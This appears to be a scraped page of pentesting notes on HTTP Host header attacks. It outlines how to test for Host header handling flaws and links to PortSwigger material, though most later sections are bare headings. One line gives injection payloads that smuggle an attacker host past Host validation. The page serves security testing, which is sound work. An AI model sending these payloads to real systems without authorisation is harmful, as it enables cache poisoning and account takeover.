HTTP Host header attacks
Attacks that involve injecting a payload directly into the Host header
How to test
Supply an arbitrary Host header
The first step is to test what happens when you supply an arbitrary, unrecognized domain name via the Host header.
Sometimes, you will still be able to access the target website even when you supply an unexpected Host header. This could be for a number of reasons. For example, servers are sometimes configured with a default or fallback option in case they receive requests for domain names that they don't recognize. If your target website happens to be the default, you're in luck. In this case, you can begin studying what the application does with the Host header and whether this behavior is exploitable.
On the other hand, as the Host header is such a fundamental part of how the websites work, tampering with it often means you will be unable to reach the target application at all. The front-end server or load balancer that received your request may simply not know where to forward it, resulting in an "Invalid Host header" error of some kind. This is especially likely if your target is accessed via a CDN. In this case, you should move on to trying some of the techniques outlined below.
Check for flawed validation
Host: vulnerable-website.com:bad-stuff-here Host: vulnerable-website.com@bad-stuff-here Host: vulnerable-website.com:123@bad-stuff-here
Send ambiguous requests
Inject duplicate Host headers
Try swapping and adding special characters volume_up content_copy
Supply an absolute URL
Add line wrapping
Ref: https://portswigger.net/web-security/request-smuggling
Inject host override headers
How to exploit the HTTP Host header
Last updated